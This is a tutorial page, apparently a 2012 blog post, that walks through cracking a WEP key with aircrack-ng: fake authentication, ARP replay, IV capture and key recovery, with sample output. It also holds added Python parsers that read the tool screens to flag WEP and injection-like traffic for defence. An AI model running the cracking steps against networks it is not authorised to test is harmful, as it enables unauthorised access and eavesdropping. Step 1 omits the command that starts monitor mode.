Thursday, January 12, 2012

WEP cracking

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng stop ath0

The system responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Step 2 - Test Wireless Device Packet Injection

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name

Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

While the injection (Step 5) is taking place, the screen will look similar to this:

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
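The airodump-ng screen above is also what a wireless assessment or a monitoring sensor has to read, so here is a small parser for it that turns the two tables into records and flags what matters from the defender's side: an AP still on WEP, and a data-frame rate that looks like replay injection rather than client traffic (one client, 338 data frames per second). This is an added example for this page, not code from aircrack-ng; the sample text is constructed from the screen above, and the 100 frames/s triage threshold is an assumed value, not a figure from the page.

```python
"""Parse an airodump-ng screen into structured records and triage it.

Added example for this page; it is not part of aircrack-ng. SAMPLE is
constructed from the capture screen shown above. The 100 frames/s
threshold is an assumed triage value, not a figure taken from the page.
"""
import re
from dataclasses import dataclass, field

MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$")
# Labels airodump-ng prints in the AUTH column; the column is blank in the
# sample above, so it has to be treated as optional when splitting a row.
AUTH_LABELS = {"OPN", "SKA", "PSK", "MGT"}

SAMPLE = """\
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
"""


@dataclass
class Station:
    bssid: str
    mac: str
    power: int
    lost: int
    packets: int
    probes: str


@dataclass
class AccessPoint:
    bssid: str
    power: int
    rxq: int
    beacons: int
    data: int
    data_per_sec: int
    channel: int
    rate: str
    enc: str
    cipher: str
    auth: str
    essid: str
    stations: list = field(default_factory=list)


def _parse_ap(tokens):
    bssid, pwr, rxq, beacons, data, dps, ch, mb, enc, cipher = tokens[:10]
    rest = tokens[10:]
    auth = rest.pop(0) if rest and rest[0] in AUTH_LABELS else ""
    return AccessPoint(bssid, int(pwr), int(rxq), int(beacons), int(data),
                       int(dps), int(ch), mb, enc, cipher, auth, " ".join(rest))


def _parse_station(tokens):
    bssid, mac, pwr, lost, packets = tokens[:5]
    return Station(bssid, mac, int(pwr), int(lost), int(packets),
                   " ".join(tokens[5:]))


def parse_airodump(text):
    """Return the list of access points, each with its associated stations."""
    aps = {}
    section = None
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "BSSID":            # table header: switch section
            section = "station" if tokens[1] == "STATION" else "ap"
            continue
        if not MAC_RE.match(tokens[0]):     # banner line or other noise
            continue
        if section == "ap":
            ap = _parse_ap(tokens)
            aps[ap.bssid] = ap
        elif section == "station" and tokens[0] in aps:
            aps[tokens[0]].stations.append(_parse_station(tokens))
    return list(aps.values())


def triage(aps, data_rate_threshold=100):
    """Flag APs that need attention: WEP, and data rates that look injected."""
    findings = []
    for ap in aps:
        if ap.enc == "WEP":
            findings.append((ap.bssid, "WEP",
                             f"{ap.essid!r} still uses WEP; migrate it to WPA2/WPA3"))
        # One (or zero) clients pushing hundreds of data frames per second is
        # the footprint of ARP replay, not of ordinary client traffic.
        if ap.data_per_sec >= data_rate_threshold and len(ap.stations) <= 1:
            findings.append((ap.bssid, "HIGH_DATA_RATE",
                             f"{ap.data_per_sec} data frames/s from "
                             f"{len(ap.stations)} station(s)"))
    return findings


if __name__ == "__main__":
    for bssid, kind, detail in triage(parse_airodump(SAMPLE)):
        print(f"{bssid} {kind}: {detail}")
```

Run it on a saved airodump-ng screen (or on the CSV it writes with -w) and both findings fire for the sample: the network is WEP, and the #/s column is far above what a single associated client generates on its own. A wireless IDS uses the same two signals, and the WEP finding is the one to close first, since nothing in the rest of this page works against WPA2.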

Step 4 - Use aireplay-ng to do a fake authentication with the access point

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:
-1 means fake authentication
0 reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name

Success looks like:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Step 6 - Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional, since when we originally captured the data we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with "output" and ending in ".cap".

Here is what success looks like:

Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
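The vote table is the part of this screen worth understanding when writing up an assessment: each KB row lists candidate values for one key byte with their statistical votes, "depth" shows how far down that list the search currently is, and the "got N IVs" figure is the exposure metric to record. The parser below, an added example for this page and not aircrack-ng code, reads a constructed copy of the screen above into records and computes the vote margin per byte; it shows, for instance, that KB 0 is a tie (12 and F9 both at 15 votes), which is exactly why the tool keeps asking for more IVs.

```python
"""Parse the aircrack-ng status screen and key-byte vote table shown above.

Added example for this page, not part of aircrack-ng. SAMPLE is a constructed
copy of the screen above; only the four key-byte rows it prints are present.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE = """\
Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
"""

STATUS_RE = re.compile(r"Tested (\d+) keys \(got (\d+) IVs\)")
ROW_RE = re.compile(r"^\s*(\d+)\s+(\d+)/\s*(\d+)\s+(.*)$")
CAND_RE = re.compile(r"([0-9A-F]{2})\(\s*(-?\d+)\)")
KEY_RE = re.compile(r"KEY FOUND!\s*\[\s*([0-9A-F:]+)\s*\]")


@dataclass
class KeyByte:
    index: int
    depth: int                         # position in the candidate list being tried
    depth_max: int                     # how many candidates the search will try
    candidates: List[Tuple[str, int]]  # (byte, votes) in printed order, top first

    def margin(self):
        """Vote lead of the top candidate over the runner-up; 0 means a tie."""
        votes = [v for _, v in self.candidates]
        return votes[0] - votes[1] if len(votes) > 1 else votes[0]


@dataclass
class CrackStatus:
    tested: Optional[int]
    ivs: Optional[int]
    key_bytes: List[KeyByte]
    key: Optional[str]
    probability: Optional[int]

    def leading_bytes(self):
        """Top-voted byte of each printed KB row, joined the way keys are shown."""
        return ":".join(kb.candidates[0][0] for kb in self.key_bytes)


def parse_aircrack(text):
    tested = ivs = None
    rows, key, prob = [], None, None
    for line in text.splitlines():
        m = STATUS_RE.search(line)
        if m:
            tested, ivs = int(m.group(1)), int(m.group(2))
            continue
        m = KEY_RE.search(line)
        if m:
            key = m.group(1)
            continue
        if line.startswith("Probability:"):
            prob = int(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        m = ROW_RE.match(line)          # the "KB depth byte(vote)" header does not match
        if m:
            cands = [(b, int(v)) for b, v in CAND_RE.findall(m.group(4))]
            if cands:
                rows.append(KeyByte(int(m.group(1)), int(m.group(2)),
                                    int(m.group(3)), cands))
    return CrackStatus(tested, ivs, rows, key, prob)


if __name__ == "__main__":
    status = parse_aircrack(SAMPLE)
    print(f"IVs captured: {status.ivs}, keys tested: {status.tested}")
    for kb in status.key_bytes:
        print(f"KB {kb.index}: top {kb.candidates[0][0]} margin {kb.margin()} "
              f"depth {kb.depth}/{kb.depth_max}")
    print("leading bytes:", status.leading_bytes(), "reported key:", status.key)
```

The leading byte of each row reproduces the first four bytes of the reported key; a small margin (KB 0) or a depth above 0 (KB 3) marks the bytes the search had to branch on. In a report, the IV count and elapsed time together are the concrete statement of how exposed the network was, and the remediation is the same regardless of the numbers: retire WEP.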
